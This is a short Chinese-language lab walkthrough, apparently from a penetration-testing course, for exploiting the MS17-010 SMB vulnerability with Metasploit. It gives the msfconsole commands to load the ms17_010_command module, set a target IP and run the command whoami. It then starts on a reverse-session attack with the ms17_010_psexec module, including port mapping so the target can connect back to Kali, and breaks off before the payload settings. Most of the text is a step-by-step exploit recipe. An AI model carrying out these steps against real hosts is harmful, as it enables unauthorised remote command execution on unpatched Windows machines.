网络拓扑
启动msf
msfconsole
搜索ms17-010 漏洞模块
search ms17-010
不反弹会话方式 (不容易打崩)
使用 auxiliary/admin/smb/ms17_010_command 模块
可以直接使用命令:
use auxiliary/admin/smb/ms17_010_command
也可以使用如下方式:
查询出来该模块编号为2 ,可以直接使用命令:
use 2
查看该模块所需参数
show options
其中yes参数是必须项
图中 RHOST 项未配置参数
配置为 目标IP set RHOSTS 10.0.3.174
设置 想要执行的命名
set COMMAND whoami
执行命令 并返回 结果
exploit
反弹会话方式
观察实验拓扑图,服务器反弹会话过程,相当于 服务器访问kali的一个端口;但是kali虚拟机以NAT方式联网,服务器无法访问192地址,只能访问到个人电脑10.250.0.XX地址。
这里便需要做个端口映射
将kali的44444 端口映射 个人电脑的44444端口
端口映射过程
vm中 编辑中 虚拟网络编辑器
加载模块exploit/windows/smb/ms17_010_psexec
配置参数如下